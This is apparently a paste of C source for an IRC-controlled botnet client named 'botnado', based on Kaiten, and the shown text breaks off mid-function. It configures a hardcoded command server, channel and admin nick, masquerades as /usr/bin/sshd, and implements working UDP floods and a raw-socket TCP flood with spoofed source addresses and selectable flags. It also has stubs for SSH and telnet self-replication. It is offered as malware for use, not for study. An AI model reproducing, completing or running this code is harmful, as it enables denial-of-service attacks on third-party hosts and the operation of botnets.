botnado.c ~ps dont put shit on my server plz

1. /*
2. /$$$$$$$ /$$ /$$
3. | $$__ $$ | $$ | $$
4. | $$ \ $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$
5. | $$$$$$$ /$$__ $$|_ $$_/ | $$__ $$ |____ $$ /$$__ $$ /$$__ $$
6. | $$__ $$| $$ \ $$ | $$ | $$ \ $$ /$$$$$$$| $$ | $$| $$ \ $$
7. | $$ \ $$| $$ | $$ | $$ /$$| $$ | $$ /$$__ $$| $$ | $$| $$ | $$
8. | $$$$$$$/| $$$$$$/ | $$$$/| $$ | $$| $$$$$$$| $$$$$$$| $$$$$$/
9. |_______/ \______/ \___/ |__/ |__/ \_______/ \_______/ \______/
10.  
11. Created By ~ ENTITY
12. Based On ~ Kaiten
13.  
14. Commands:
15. [ Attack ]
16. >bot +unk <ip> <seconds>
17. >bot +udp <ip> <port> <seconds>
18. >bot +std <ip> <port> <seconds>
19. >bot +tcp <ip> <port> <seconds> <subnet> <method> <size> <interval>
20.  
21. [ Attack Examples ]
22. // #### UDP METHODS #### //
23. >bot +unk 1.3.3.7 20 'hit 1.3.3.7 for 20 seconds w/ udp
24. >bot +udp 1.3.3.7 53 20 'hit 1.3.3.7 for 20 seconds on port 53 w/ udp
25. >bot +std 1.3.3.7 53 20 'hit 1.3.3.7 for 20 seconds on port 53 w/ std(weak udp)
26.  
27. // #### TCP METHODS #### //
28. >bot +tcp 1.3.3.7 22 20 32 all 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ all tcp methods non-spoofed
29. >bot +tcp 1.3.3.7 22 20 8.8 all 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ all tcp methods spoofed
30.  
31. >bot +tcp 1.3.3.7 22 20 32 syn 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ syn non-spoofed
32. >bot +tcp 1.3.3.7 22 20 8.8 syn 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ syn spoofed
33.  
34. >bot +tcp 1.3.3.7 22 20 32 ack 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ ack non-spoofed
35. >bot +tcp 1.3.3.7 22 20 8.8 ack 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ ack spoofed
36.  
37. >bot +tcp 1.3.3.7 22 20 32 fin 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ fin non-spoofed
38. >bot +tcp 1.3.3.7 22 20 8.8 fin 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ fin spoofed
39.  
40. >bot +tcp 1.3.3.7 22 20 32 psh 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ psh non-spoofed
41. >bot +tcp 1.3.3.7 22 20 8.8 psh 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ psh spoofed
42.  
43. >bot +tcp 1.3.3.7 22 20 32 rst 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ rst non-spoofed
44. >bot +tcp 1.3.3.7 22 20 8.8 rst 0 10 'hit 1.3.3.7 for 20 seconds on port 22 w/ rst spoofed
45.  
46. [ Other ]
47. >bot +subnet
48. >bot +botkill
49. >bot +killattk
50. >bot +server <ip>
51. >bot +spoof <subnet>
52. */
53.  
54. /********************************************************************\
55. | CONFIGURE THESE |
56. \********************************************************************/
57.  
58. // #### DEFAULT SETTINGS #### //
59. int numservers=1;
60. char *servers[] = {
61. "173.192.185.248",
62. (void*)0
63. };
64. static char *irc_port = ("1137");
65. static char *irc_chan = ("#rekt");
66. char *admin = ("catsmeow");
67. char *bot_prefix = ("[REKT]");
68.  
69. // #### ATTACK MESSAGES #### //
70. /* leave a space at the end of each msg for the ip address of the target */
71. char *unk_msg = ("[UNK] Attacking");
72. char *udp_msg = ("[UDP] Attacking");
73. char *std_msg = ("[STD] Attacking");
74. char *tcp_msg = ("[TCP] Attacking");
75. char *syn_msg = ("[SYN] Attacking");
76. char *ack_msg = ("[ACK] Attacking");
77. char *fin_msg = ("[FIN] Attacking");
78. char *rst_msg = ("[RST] Attacking");
79. char *psh_msg = ("[PSH] Attacking");
80.  
81. // #### OTHER SETTINGS #### //
82. #undef IDENT
83. #define KEY ""
84. #define PASS ""
85. #define STARTUP
86.  
87.  
88.  
89.  
90. /********************************************************************\
91. | DO NOT EDIT UNLESS YOU GANGSTER AF |
92. \********************************************************************/
93. #define PREFIX ("%s",bot_prefix)
94. #define PORT atol(irc_port)
95. #define CHAN ("%s",irc_chan)
96.  
97. #define STD2_SIZE 50
98. #define STD2_STRING "std"
99. #define FAKENAME "/usr/bin/sshd"
100.  
101. #define PAD_RIGHT 1
102. #define PAD_ZERO 2
103. #define PRINT_BUF_LEN 12
104. #define CMD_IAC 255
105. #define CMD_WILL 251
106. #define CMD_WONT 252
107. #define CMD_DO 253
108. #define CMD_DONT 254
109. #define OPT_SGA 3
110.  
111. #include <stdlib.h>
112. #include <stdarg.h>
113. #include <stdio.h>
114. #include <sys/socket.h>
115. #include <sys/types.h>
116. #include <netinet/in.h>
117. #include <arpa/inet.h>
118. #include <netdb.h>
119. #include <signal.h>
120. #include <strings.h>
121. #include <string.h>
122. #include <sys/utsname.h>
123. #include <unistd.h>
124. #include <fcntl.h>
125. #include <errno.h>
126. #include <netinet/ip.h>
127. #include <netinet/udp.h>
128. #include <netinet/tcp.h>
129. #include <sys/wait.h>
130. #include <sys/ioctl.h>
131. #include <net/if.h>
132.  
133. int sock,changeservers=0;
134. char *server, *chan, *key, *nick, *ident, *prefix, *user, *pass, disabled=0, udpTry = 0;
135. unsigned int *pids;
136. unsigned long spoofs=0, spoofsm=0, numpids=0;
137.  
138. int strwildmatch(unsigned char* pattern, unsigned char* string) {
139. switch((unsigned char)*pattern) {
140. case '\0': return *string;
141. case 'b': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
142. case 'o': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
143. case 't': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
144. case 'B': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
145. case 'O': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
146. case 'T': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
147. case '?': return !(*string && !strwildmatch(pattern+1, string+1));
148. default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
149. }
150. }
151. int Send(int sock, char *words, ...) {
152. static char textBuffer[1024];
153. va_list args;
154. va_start(args, words);
155. vsprintf(textBuffer, words, args);
156. va_end(args);
157. return write(sock,textBuffer,strlen(textBuffer));
158. }
159. unsigned int host2ip(char *sender,char *hostname) {
160. static struct in_addr i;
161. struct hostent *h;
162. if((i.s_addr = inet_addr(hostname)) == -1) {
163. if((h = gethostbyname(hostname)) == NULL) {
164. Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
165. exit(0);
166. }
167. bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
168. }
169. return i.s_addr;
170. }
171. int mfork(char *sender) {
172. unsigned int parent, *newpids, i;
173. if (disabled == 1) {
174. Send(sock,"NOTICE %s :Unable to comply.\n",sender);
175. return 1;
176. }
177. parent=fork();
178. if (parent <= 0) return parent;
179. numpids++;
180. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
181. for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
182. newpids[numpids-1]=parent;
183. free(pids);
184. pids=newpids;
185. return parent;
186. }
187. void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
188. char *makestring() {
189. char *tmp;
190. int len=(rand()%5)+4,i;
191. FILE *file;
192. tmp=(char*)malloc(len+1);
193. memset(tmp,0,len+1);
194. char *pre;
195. if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
196. else {
197. int a=((rand()*rand())%45402)+1;
198. char buf[1024];
199. for (i=0;i<a;i++) fgets(buf,1024,file);
200. memset(buf,0,1024);
201. fgets(buf,1024,file);
202. filter(buf);
203. memcpy(tmp,buf,len);
204. fclose(file);
205. }
206. return tmp;
207. }
208. void identd() {
209. int sockname,sockfd,sin_size,tmpsock,i;
210. struct sockaddr_in my_addr,their_addr;
211. char szBuffer[1024];
212. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
213. my_addr.sin_family = AF_INET;
214. my_addr.sin_port = htons(113);
215. my_addr.sin_addr.s_addr = INADDR_ANY;
216. memset(&(my_addr.sin_zero), 0, 8);
217. if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
218. if (listen(sockfd, 1) == -1) return;
219. if (fork() == 0) return;
220. sin_size = sizeof(struct sockaddr_in);
221. if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
222. for(;;) {
223. fd_set bla;
224. struct timeval timee;
225. FD_ZERO(&bla);
226. FD_SET(tmpsock,&bla);
227. timee.tv_sec=timee.tv_usec=60;
228. if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
229. if (FD_ISSET(tmpsock,&bla)) break;
230. }
231. i = recv(tmpsock,szBuffer,1024,0);
232. if (i <= 0 || i >= 20) exit(0);
233. szBuffer[i]=0;
234. if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
235. if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
236. Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
237. close(tmpsock);
238. close(sockfd);
239. exit(0);
240. }
241. long pow(long a, long b) {
242. if (b == 0) return 1;
243. if (b == 1) return a;
244. return a*pow(a,b-1);
245. }
246. u_short in_cksum(u_short *addr, int len) {
247. register int nleft = len;
248. register u_short *w = addr;
249. register int sum = 0;
250. u_short answer =0;
251. while (nleft > 1) {
252. sum += *w++;
253. nleft -= 2;
254. }
255. if (nleft == 1) {
256. *(u_char *)(&answer) = *(u_char *)w;
257. sum += answer;
258. }
259. sum = (sum >> 16) + (sum & 0xffff);
260. sum += (sum >> 16);
261. answer = ~sum;
262. return(answer);
263. }
264. unsigned long getspoof() {
265. if (!spoofs) return rand();
266. if (spoofsm == 1) return ntohl(spoofs);
267. return ntohl(spoofs+(rand() % spoofsm)+1);
268. }
269. struct send_tcp {
270. struct iphdr ip;
271. struct tcphdr tcp;
272. char buf[20];
273. };
274. struct pseudo_header {
275. unsigned int source_address;
276. unsigned int dest_address;
277. unsigned char placeholder;
278. unsigned char protocol;
279. unsigned short tcp_length;
280. struct tcphdr tcp;
281. char buf[20];
282. };
283. int getHost(unsigned char *toGet, struct in_addr *i) {
284. struct hostent *h;
285. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
286. return 0;
287. }
288.  
289.  
290.  
291.  
292. /*
293. /$$ /$$ /$$ /$$ /$$
294. | $$$ /$$$ | $$ | $$ | $$
295. | $$$$ /$$$$ /$$$$$$ /$$$$$$ | $$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$
296. | $$ $$/$$ $$ /$$__ $$|_ $$_/ | $$__ $$ /$$__ $$ /$$__ $$ /$$_____/
297. | $$ $$$| $$| $$$$$$$$ | $$ | $$ \ $$| $$ \ $$| $$ | $$| $$$$$$
298. | $$\ $ | $$| $$_____/ | $$ /$$| $$ | $$| $$ | $$| $$ | $$ \____ $$
299. | $$ \/ | $$| $$$$$$$ | $$$$/| $$ | $$| $$$$$$/| $$$$$$$ /$$$$$$$/
300. |__/ |__/ \_______/ \___/ |__/ |__/ \______/ \_______/|_______/
301. */
302.  
303.  
304. // ***************************************************** \\
305. // # STD FLOODER # \\
306. // ***************************************************** \\*
307. void std(int sock, char *sender, int argc, char **argv) {
308. int flag=1,fd,i;
309. unsigned long secs;
310. struct hostent *hp;
311. struct sockaddr_in in;
312. time_t start=time(NULL);
313. if (mfork(sender) != 0) return;
314. if (argc < 2) {
315. //Send(sock,"NOTICE %s :STD <target> <port> <secs>\n",sender);
316. exit(1);
317. }
318. secs=atol(argv[3]);
319. memset((void*)&in,0,sizeof(struct sockaddr_in));
320. in.sin_addr.s_addr=host2ip(sender,argv[1]);
321. in.sin_family = AF_INET;
322. Send(sock,"NOTICE %s :%s %s\n",sender,std_msg,argv[1]);
323. while(1) {
324. in.sin_port = atol(argv[2]);
325. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
326. else {
327. flag=1;
328. ioctl(fd,FIONBIO,&flag);
329. sendto(fd,STD2_STRING,STD2_SIZE,0,(struct sockaddr*)&in,sizeof(in));
330. close(fd);
331. }
332. if (i >= 50) {
333. if (time(NULL) >= start+secs) break;
334. i=0;
335. }
336. i++;
337. }
338. close(fd);
339. exit(0);
340. }
341.  
342.  
343. // ***************************************************** \\
344. // # UDP FLOODER # \\
345. // ***************************************************** \\*
346. void udp(int sock, char *sender, int argc, char **argv) {
347. int flag=1,fd,i;
348. unsigned long secs;
349. char *buf=(char*)malloc(9216);
350. struct hostent *hp;
351. struct sockaddr_in in;
352. time_t start=time(NULL);
353. if (mfork(sender) != 0) return;
354. if (argc < 2) {
355. //Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
356. exit(1);
357. }
358. secs=atol(argv[3]);
359. memset((void*)&in,0,sizeof(struct sockaddr_in));
360. in.sin_addr.s_addr=host2ip(sender,argv[1]);
361. in.sin_family = AF_INET;
362. Send(sock,"NOTICE %s :%s %s\n",sender,udp_msg,argv[1]);
363. while(1) {
364. in.sin_port = atol(argv[2]);
365. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
366. else {
367. flag=1;
368. ioctl(fd,FIONBIO,&flag);
369. sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
370. close(fd);
371. }
372. if (i >= 50) {
373. if (time(NULL) >= start+secs) break;
374. i=0;
375. }
376. i++;
377. }
378. close(fd);
379. exit(0);
380. }
381.  
382.  
383. // ***************************************************** \\
384. // # UNKNOWN FLOODER # \\
385. // ***************************************************** \\*
386. void unk(int sock, char *sender, int argc, char **argv) {
387. int flag=1,fd,i;
388. unsigned long secs;
389. char *buf=(char*)malloc(9216);
390. struct hostent *hp;
391. struct sockaddr_in in;
392. time_t start=time(NULL);
393. if (mfork(sender) != 0) return;
394. if (argc < 2) {
395. //Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender);
396. exit(1);
397. }
398. secs=atol(argv[2]);
399. memset((void*)&in,0,sizeof(struct sockaddr_in));
400. in.sin_addr.s_addr=host2ip(sender,argv[1]);
401. in.sin_family = AF_INET;
402. Send(sock,"NOTICE %s :%s %s\n",sender,unk_msg,argv[1]);
403. while(1) {
404. in.sin_port = rand();
405. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
406. else {
407. flag=1;
408. ioctl(fd,FIONBIO,&flag);
409. sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
410. close(fd);
411. }
412. if (i >= 50) {
413. if (time(NULL) >= start+secs) break;
414. i=0;
415. }
416. i++;
417. }
418. close(fd);
419. exit(0);
420. }
421.  
422.  
423. // ***************************************************** \\
424. // # TCP FLOODER # \\
425. // ***************************************************** \\*
426.  
427. // #### TCP ATTACK DEPENDENCIES #### //
428. struct in_addr ourIP;
429. unsigned char macAddress[6] = {0};
430. static uint32_t Q[4096], c = 362436;
431. unsigned short csum (unsigned short *buf, int count)
432. {
433. register uint64_t sum = 0;
434. while( count > 1 ) { sum += *buf++; count -= 2; }
435. if(count > 0) { sum += *(unsigned char *)buf; }
436. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
437. return (uint16_t)(~sum);
438. }
439. uint32_t rand_cmwc(void)
440. {
441. uint64_t t, a = 18782LL;
442. static uint32_t i = 4095;
443. uint32_t x, r = 0xfffffffe;
444. i = (i + 1) & 4095;
445. t = a * Q[i] + c;
446. c = (uint32_t)(t >> 32);
447. x = t + c;
448. if (x < c) {
449. x++;
450. c++;
451. }
452. return (Q[i] = r - x);
453. }
454. in_addr_t getRandomIP(in_addr_t netmask)
455. {
456. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
457. return tmp ^ ( rand_cmwc() & ~netmask);
458. }
459. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
460. {
461.  
462. struct tcp_pseudo
463. {
464. unsigned long src_addr;
465. unsigned long dst_addr;
466. unsigned char zero;
467. unsigned char proto;
468. unsigned short length;
469. } pseudohead;
470. unsigned short total_len = iph->tot_len;
471. pseudohead.src_addr=iph->saddr;
472. pseudohead.dst_addr=iph->daddr;
473. pseudohead.zero=0;
474. pseudohead.proto=IPPROTO_TCP;
475. pseudohead.length=htons(sizeof(struct tcphdr));
476. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
477. unsigned short *tcp = malloc(totaltcp_len);
478. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
479. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
480. unsigned short output = csum(tcp,totaltcp_len);
481. free(tcp);
482. return output;
483. }
484. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
485. {
486. iph->ihl = 5;
487. iph->version = 4;
488. iph->tos = 0;
489. iph->tot_len = sizeof(struct iphdr) + packetSize;
490. iph->id = rand_cmwc();
491. iph->frag_off = 0;
492. iph->ttl = MAXTTL;
493. iph->protocol = protocol;
494. iph->check = 0;
495. iph->saddr = source;
496. iph->daddr = dest;
497. }
498. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
499. {
500. int got = 1, total = 0;
501. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
502. return got == 0 ? NULL : buffer;
503. }
504. int getOurIP()
505. {
506. int sock = socket(AF_INET, SOCK_DGRAM, 0);
507. if(sock == -1) return 0;
508.  
509. struct sockaddr_in serv;
510. memset(&serv, 0, sizeof(serv));
511. serv.sin_family = AF_INET;
512. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
513. serv.sin_port = htons(53);
514.  
515. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
516. if(err == -1) return 0;
517.  
518. struct sockaddr_in name;
519. socklen_t namelen = sizeof(name);
520. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
521. if(err == -1) return 0;
522.  
523. ourIP.s_addr = name.sin_addr.s_addr;
524.  
525. int cmdline = open("/proc/net/route", O_RDONLY);
526. char linebuf[4096];
527. while(fdgets(linebuf, 4096, cmdline) != NULL)
528. {
529. if(strstr(linebuf, "\t00000000\t") != NULL)
530. {
531. unsigned char *pos = linebuf;
532. while(*pos != '\t') pos++;
533. *pos = 0;
534. break;
535. }
536. memset(linebuf, 0, 4096);
537. }
538. close(cmdline);
539.  
540. if(*linebuf)
541. {
542. int i;
543. struct ifreq ifr;
544. strcpy(ifr.ifr_name, linebuf);
545. ioctl(sock, SIOCGIFHWADDR, &ifr);
546. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
547. }
548.  
549. close(sock);
550. }
551.  
552. // #### TCP ATTACK FUNCTION #### //
553. void tcp(int sock, char *sender, int argc, char **argv)
554. {
555. if(argc < 7) {
556. // do nothing
557. } else {
558. register unsigned int pollRegister;
559. pollRegister = atol(argv[7]);
560.  
561. struct sockaddr_in dest_addr;
562.  
563. dest_addr.sin_family = AF_INET;
564. if(atol(argv[2]) == 0) dest_addr.sin_port = rand_cmwc();
565. else dest_addr.sin_port = atol(argv[2]);
566. if(getHost(strdup(argv[1]), &dest_addr.sin_addr)) return;
567. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
568.  
569. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
570. if(!sockfd)
571. {
572. //sockprintf(mainCommSock, "Failed opening raw socket.");
573. return;
574. }
575.  
576. int tmp = 1;
577. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
578. {
579. //sockprintf(mainCommSock, "Failed setting raw headers mode.");
580. return;
581. }
582.  
583. in_addr_t netmask;
584.  
585. if ( atol(argv[4]) == 0 ) netmask = ( ~((in_addr_t) -1) );
586. else netmask = ( ~((1 << (32 - atol(argv[4]))) - 1) );
587.  
588. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + atol(argv[6])];
589. struct iphdr *iph = (struct iphdr *)packet;
590. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
591.  
592. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + atol(argv[6]));
593.  
594. tcph->source = rand_cmwc();
595. tcph->seq = rand_cmwc();
596. tcph->ack_seq = 0;
597. tcph->doff = 5;
598.  
599. if(!strcmp(strdup(argv[5]), "all"))
600. {
601. tcph->syn = 1;
602. tcph->rst = 1;
603. tcph->fin = 1;
604. tcph->ack = 1;
605. tcph->psh = 1;
606. Send(sock,"NOTICE %s :%s %s\n",sender,tcp_msg,argv[1]);
607. } else {
608. unsigned char *pch = strtok(strdup(argv[5]), ",");
609. while(pch)
610. {
611. if(!strcmp(pch, "syn"))
612. {
613. tcph->syn = 1;
614. Send(sock,"NOTICE %s :%s %s\n",sender,syn_msg,argv[1]);
615. } else if(!strcmp(pch, "rst"))
616. {
617. tcph->rst = 1;
618. Send(sock,"NOTICE %s :%s %s\n",sender,rst_msg,argv[1]);
619. } else if(!strcmp(pch, "fin"))
620. {
621. tcph->fin = 1;
622. Send(sock,"NOTICE %s :%s %s\n",sender,fin_msg,argv[1]);
623. } else if(!strcmp(pch, "ack"))
624. {
625. tcph->ack = 1;
626. Send(sock,"NOTICE %s :%s %s\n",sender,ack_msg,argv[1]);
627. } else if(!strcmp(pch, "psh"))
628. {
629. tcph->psh = 1;
630. Send(sock,"NOTICE %s :%s %s\n",sender,psh_msg,argv[1]);
631. } else {
632. //sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
633. }
634. pch = strtok(NULL, ",");
635. }
636. }
637.  
638. tcph->window = rand_cmwc();
639. tcph->check = 0;
640. tcph->urg_ptr = 0;
641. tcph->dest = (atol(argv[2]) == 0 ? rand_cmwc() : atol(argv[2]));
642. tcph->check = tcpcsum(iph, tcph);
643.  
644. iph->check = csum ((unsigned short *) packet, iph->tot_len);
645.  
646. int end = time(NULL) + atol(argv[3]);
647. register unsigned int i = 0;
648. while(1)
649. {
650. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
651.  
652. iph->saddr = htonl( getRandomIP(netmask) );
653. iph->id = rand_cmwc();
654. tcph->seq = rand_cmwc();
655. tcph->source = rand_cmwc();
656. tcph->check = 0;
657. tcph->check = tcpcsum(iph, tcph);
658. iph->check = csum ((unsigned short *) packet, iph->tot_len);
659.  
660. if(i == pollRegister)
661. {
662. if(time(NULL) > end) break;
663. i = 0;
664. continue;
665. }
666. i++;
667. }
668. }
669. }
670.  
671.  
672. // ***************************************************** \\
673. // # SELF REPLICATION # \\
674. // ***************************************************** \\*
675.  
676. // #### SSH SCANNER #### //
677. void ssh_scan(int sock, char *sender, int argc, char **argv) {
678.  
679. }
680.  
681. // #### TELNET SCANNER #### //
682. void telnet_scan(int sock, char *sender, int argc, char **argv) {
683.  
684. }
685.  
686.  
687. // ***************************************************** \\
688. // # BOTKILLER # \\
689. // ***************************************************** \\*
690. void killsec(int sock, char *sender, int argc, char **argv) {
691. if(strcasecmp(admin,sender) == 0){
692. kill(0,9);
693. } else {
694. Send(sock,"PRIVMSG %s :You do not have permission to do this.\n", chan);
695. }
696. }
697.  
698. // ***************************************************** \\
699. // # STOP ALL ATTACKS # \\
700. // ***************************************************** \\*
701. void stop(int sock, char *sender, int argc, char **argv){
702. unsigned long i;
703. for (i=0;i<numpids;i++) {
704. if (pids[i] != 0 && pids[i] != getpid()) {
705. if (sender) Send(sock,"PRIVMSG %s :Killing PID %d.\n",chan,pids[i]);
706. kill(pids[i],9);
707. }
708. }
709. for (i = 0; i < numpids; i++) {
710. if (pids[i] != 0 && pids[i] != getpid()) {
711. kill(pids[i], 9);
712. }
713. }
714. }
715.  
716. // ***************************************************** \\
717. // # SUBNET SPOOFER # \\
718. // ***************************************************** \\*
719. void spoof(int sock, char *sender, int argc, char **argv) {
720. char ip[256];
721. int i, num;
722. unsigned long uip;
723. if (argc != 1) {
724. Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
725. spoofs=0;
726. spoofsm=0;
727. return;
728. }
729. if (strlen(argv[1]) > 16) {
730. Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
731. return;
732. }
733. strcpy(ip,argv[1]);
734. if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
735. for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
736. num=-(num-4);
737. for (i=0;i<num;i++) strcat(ip,".0");
738. uip=inet_network(ip);
739. if (num == 0) spoofsm=1;
740. else spoofsm=pow(256,num);
741. spoofs=uip;
742. Send(sock,"NOTICE %s :Subnet Has Been Spoofed - %s.\n",sender, argv[1]);
743. }
744. void getspoofs(int sock, char *sender, int argc, char **argv) {
745. unsigned long a=spoofs,b=spoofs+(spoofsm-1);
746. if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
747. else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
748. }
749.  
750.  
751. // ***************************************************** \\
752. // # SERVER CHANGER # \\
753. // ***************************************************** \\*
754. void move(int sock, char *sender, int argc, char **argv) {
755. if (argc < 1) {
756. // do nothing
757. } else {
758. if(strcasecmp(admin,sender) == 0) {
759. server = strdup(argv[1]);
760. changeservers = 1;
761. close(sock);
762. } else {
763. Send(sock,"PRIVMSG %s :You do not have permission to do this.\n", chan);
764. }
765. }
766. }
767.  
768.  
769. // ***************************************************** \\
770. // # COMMAND LIST # \\
771. // ***************************************************** \\*
772. struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
773. { "+std" , std },
774. { "+udp" , udp },
775. { "+unk" , unk },
776. { "+tcp" , tcp },
777.  
778. { "+spoof" , spoof },
779. { "+server" , move },
780. { "+subnet" , getspoofs },
781. { "+botkill" , killsec },
782. { "+killattk" , stop },
783.  
784.  
785. { (char *)0, (void (*)(int,char *,int,char **))0 } };
786.  
787.  
788.  
789.  
790.  
791. /*
792. /$$ /$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$
793. | $$$ /$$$ /$$__ $$ | $$ | $$ /$$__ $$| $$ |__/ | $$
794. | $$$$ /$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ | $$$$$$$ /$$$$$$ /$$$$$$ | $$ \__/| $$$$$$$ /$$ /$$$$$$
795. | $$ $$/$$ $$ /$$__ $$ /$$__ $$ /$$__ $$ | $$ | $$|_ $$_/ | $$__ $$ /$$__ $$ /$$__ $$ | $$$$$$ | $$__ $$| $$|_ $$_/
796. | $$ $$$| $$| $$ \ $$| $$ \__/| $$$$$$$$ | $$ | $$ | $$ | $$ \ $$| $$$$$$$$| $$ \__/ \____ $$| $$ \ $$| $$ | $$
797. | $$\ $ | $$| $$ | $$| $$ | $$_____/ | $$ | $$ | $$ /$$| $$ | $$| $$_____/| $$ /$$ \ $$| $$ | $$| $$ | $$ /$$
798. | $$ \/ | $$| $$$$$$/| $$ | $$$$$$$ | $$$$$$/ | $$$$/| $$ | $$| $$$$$$$| $$ | $$$$$$/| $$ | $$| $$ | $$$$/
799. |__/ |__/ \______/ |__/ \_______/ \______/ \___/ |__/ |__/ \_______/|__/ \______/ |__/ |__/|__/ \___/
800. */
801. void _PRIVMSG(int sock, char *sender, char *str) {
802. int i;
803. char *to, *message;
804.  
805. for (i=0;i<strlen(str) && str[i] != ' ';i++);
806. str[i]=0;
807. to=str;
808. message=str+i+2;
809. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
810. sender[i]=0;
811. if (*message == '>' && !strcasecmp(to,chan)) {
812. char *params[12], name[1024]={0};
813. int num_params=0, m;
814. message++;
815. for (i=0;i<strlen(message) && message[i] != ' ';i++);
816. message[i]=0;
817. if (strwildmatch(message,nick)) return;
818. message+=i+1;
819. m=strlen(message);
820. for (i=0;i<m;i++) {
821. if (*message == ' ' || *message == 0) break;
822. name[i]=*message;
823. message++;
824. }
825. for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
826. num_params++;
827. if (num_params > 10) num_params=10;
828. params[0]=name;
829. params[num_params+1]="\0";
830. m=1;
831. while (*message != 0) {
832. message++;
833. if (m >= num_params) break;
834. for (i=0;i<strlen(message) && message[i] != ' ';i++);
835. params[m]=(char*)malloc(i+1);
836. strncpy(params[m],message,i);
837. params[m][i]=0;
838. m++;
839. message+=i;
840. }
841. for (m=0; flooders[m].cmd != (char *)0; m++) {
842. if (!strcasecmp(flooders[m].cmd,name)) {
